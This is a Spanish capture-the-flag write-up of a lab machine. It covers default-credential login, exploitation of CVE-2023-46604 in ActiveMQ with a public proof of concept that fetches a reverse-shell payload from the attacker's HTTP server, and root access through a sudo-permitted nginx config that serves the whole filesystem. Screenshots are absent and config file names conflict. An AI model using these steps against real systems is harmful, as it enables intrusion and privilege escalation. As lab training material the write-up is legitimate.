Hacemos el reconocimiento de nmap:
Accedemos al puerto 80 y nos encontramos con esto:
Pero si ponemos admin:admin accedemos:
Pero si hacemos clic en este enlace, nos redirige a un panel de admin:
Donde vemos información sensible, como la versión 5.15 de este servicio:
Y si buscamos por internet, encontramos el CVE-2023-46604:
Buscamos una PoC en github y nos encontramos la siguiente: https://github.com/evkl1d/CVE-2023-46604
Donde nos indican que vamos a necesitar subir con este exploit el fichero poc.xml:
Vemos las instrucciones de uso:
Editamos el contenido del fichero poc.xml añadiendo la reverse shell:
Nos ponemos a la escucha con netcat:
Levantamos un servidor HTTP con Python con el archivo PoC.xml:
Ejecutamos el exploit:
python3 exploit.py -i 10.10.11.243 -u http://10.10.16.7/poc.xml
Y habremos recibido la reverse shell:
Vemos que podemos ejecutar con root nginx:
Para ello, nos copiamos el fichero de configuración de nginx y lo modificamos:
cp /etc/nginx/nginx.conf /tmp mv nginx.conf pwned.conf
Y lo editamos añadiendo el siguiente contenido:
user root;
events {
worker_connections 1024;
}
http {
server {
listen 1337;
root /;
autoindex on;
}
}
Ahora levantamos el servidor nginx cargando el nuevo fichero de configuración malicioso:
sudo /usr/sbin/nginx -c /tmp/hack.conf
Y ahora desde curl y especificando el puerto 1337, que fue el que indicamos antes, ya podremos acceder a cualquier directorio o archivo del sistema ya que estaríamos moviéndonos como root:
curl localhost:1337/root/root.txt


















